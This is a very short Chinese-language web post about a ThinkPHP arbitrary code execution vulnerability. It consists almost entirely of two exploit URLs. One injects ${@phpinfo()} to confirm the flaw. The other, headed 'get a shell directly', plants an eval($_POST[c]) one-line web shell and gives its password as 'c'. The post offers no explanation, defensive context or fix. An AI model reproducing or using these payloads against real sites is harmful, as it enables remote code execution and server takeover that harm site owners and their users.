天天看點

thinkphp任意代碼執行漏洞

http://site.com/index.php/module/action/param1/${@phpinfo()}

直接拿SHELL

index.php/module/action/param1/${@eval%28$_POST[c]%29} 密碼:c